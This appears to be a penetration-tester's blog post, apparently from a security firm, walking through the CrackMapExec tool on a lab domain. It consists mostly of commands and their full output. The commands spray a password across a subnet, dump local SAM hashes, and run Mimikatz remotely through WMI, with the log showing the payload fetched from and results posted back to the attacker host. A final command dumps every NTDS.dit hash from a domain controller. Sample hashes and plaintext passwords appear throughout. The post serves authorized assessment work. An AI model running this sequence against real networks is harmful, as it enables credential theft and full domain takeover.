We’ve talked about using WMI to execute commands remotely, instead of using PSEXEC. We even released a script that will automate obtaining a Meterpreter shell through WMI calls.
I’ve recently stumbled upon a script that includes all of these functions an more and it has become my favorite post-exploitation tool. It’s multi-threaded, contains no local binaries, and no dropper binaries. It provides a plethora of functionality to escalate privileges on the network, all through WMI calls. The tool is CrackMapExec, written by byt3bl33d3r.
Imagine that we’ve compromised credentials on an internal assessment. CrackMapExec can easily be utilized to find where those credentials have elevated privileges. This command executes 100 threads attempting to login to all systems on the 192.168.81.0/24 range:
[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p Password123 -d workgroup -t 100 192.168.81.0/24 03-08-2016 12:34:29 SMB 192.168.81.10:445 PWNT-DC [*] Windows 6.1 Build 7601 (name:PWNT-DC) (domain:workgroup) 03-08-2016 12:34:29 SMB 192.168.81.10:445 PWNT-DC [-] workgroup\TrustedSec:Password123 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.) 03-08-2016 12:34:35 SMB 192.168.81.216:445 WIN7-SPOONMAN [*] Windows 6.1 Build 7601 (name:WIN7-SPOONMAN) (domain:workgroup) 03-08-2016 12:34:35 SMB 192.168.81.219:445 WIN8-SPOONMAN [*] Windows 10.0 Build 10586 (name:WIN8-SPOONMAN) (domain:workgroup) 03-08-2016 12:34:35 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123 03-08-2016 12:34:35 SMB 192.168.81.219:445 WIN8-SPOONMAN [-] workgroup\TrustedSec:Password123 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)Finding administrative access on one system, we can then run a hashdump, which may be able to be utilized in a pass-the-hash attack to other systems on the network:
[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p Password123 -d workgroup 192.168.81.216 --sam 03-08-2016 12:39:54 SMB 192.168.81.216:445 WIN7-SPOONMAN [*] Windows 6.1 Build 7601 (name:WIN7-SPOONMAN) (domain:workgroup) 03-08-2016 12:39:54 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123 03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Dumping SAM hashes (uid:rid:lmhash:nthash) 03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN Administrator:500:aad3b435b51404eeaad3b435b51404ee:bc23a1506bd3c8d3a533680c516bab27::: 03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN TrustedSec:1001:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71::: 03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN ASPNET:1005:aad3b435b51404eeaad3b435b51404ee:e8dfb6d1552e2fc23a66e8d573abbdba::: 03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN HomeGroupUser$:1007:aad3b435b51404eeaad3b435b51404ee:46e6eeed8d95245e068dfbec8a81ef40::: 03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN TrustedUser:1012:aad3b435b51404eeaad3b435b51404ee:dea92d9004d55c23189754069eeec7fc:::We can also scrape clear text credentials from memory:
[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p Password123 -d workgroup 192.168.81.216 --mimikatz 03-08-2016 12:40:54 SMB 192.168.81.216:445 WIN7-SPOONMAN [*] Windows 6.1 Build 7601 (name:WIN7-SPOONMAN) (domain:workgroup) 03-08-2016 12:40:55 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123 03-08-2016 12:40:56 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Executed command via WMIEXEC 03-08-2016 12:40:59 192.168.81.216 - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - 03-08-2016 12:41:04 192.168.81.216 - - "POST / HTTP/1.1" 200 - 03-08-2016 12:41:04 PARSER 192.168.81.216:1138 [+] Found plain text credentials (domain\user:password) 03-08-2016 12:41:04 PARSER 192.168.81.216:1138 PWNT\TrustedSec:GoatBah1! 03-08-2016 12:41:04 PARSER 192.168.81.216:1138 PWNT\WIN7-SPOONMAN$:%Xa4Qt*Qbq\I3N-DdW?@btkdv1-]JK<AQ@I;k`K4e, 2"Q,(%NZy@hfQy^q"q;<L+ubiD7"np;=T#c<\]\]criYyy[(nE y6(Ra;as[Z-Sti-pbm; 03-08-2016 12:41:04 PARSER 192.168.81.216:1138 PWNT\WIN7-SPOONMAN$:%Xa4Qt*Qbq\I3N-DdW?@btkdv1-]JK<AQ@I;k`K4e, 2"Q,(%NZy@hfQy^q"q;<L+ubiD7"np;=T#c<\]\]criYyy[(nE y6(Ra;as[Z-Sti-pbm; 03-08-2016 12:41:04 PARSER 192.168.81.216:1138 [*] Saved Mimikatz's output to Mimikatz-192.168.81.216-2016-03-08_124104.logNotice that all results are logged to the ./logs directory. We have a member of the “Domain Admins” group from Mimikatz, so lets retrieve hashes safely from NTDS.dit on the domain controller:
[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p GoatBah1! -d pwnt.com 192.168.81.10 --ntds drsuapi 03-08-2016 12:43:45 SMB 192.168.81.10:445 PWNT-DC [*] Windows 6.1 Build 7601 (name:PWNT-DC) (domain:pwnt.com) 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC [+] Login successful pwnt.com\TrustedSec:GoatBah1! 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC [+] Dumping NTDS.dit secrets using the DRSUAPI method (domain\uid:rid:lmhash:nthash) 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:918d38906649503fde8a641dbd87d857::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:903cd15bd70bbd6f4517ad01eeccbe15::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC TrustedSec:1000:aad3b435b51404eeaad3b435b51404ee:918d38906649503fde8a641dbd87d857::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC pwnt.com\testuser:1104:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC PWNT-DC$:1001:aad3b435b51404eeaad3b435b51404ee:07a60a315af67d202aa52e846ee4fb27::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC TEST$:1105:aad3b435b51404eeaad3b435b51404ee:4ab69c349bfaa599b46069f3d57dbe49::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC TEST2$:1106:aad3b435b51404eeaad3b435b51404ee:3ce8a48ae2264366c6c0ce9b6155bab6::: 03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC WIN7-SPOONMAN$:1109:aad3b435b51404eeaad3b435b51404ee:63c459c139c5bdeb4c404327261d75f1:::These are just a couple of examples, but there is so much more functionality packed into this script. So check it out! Thanks byt3bl33d3r!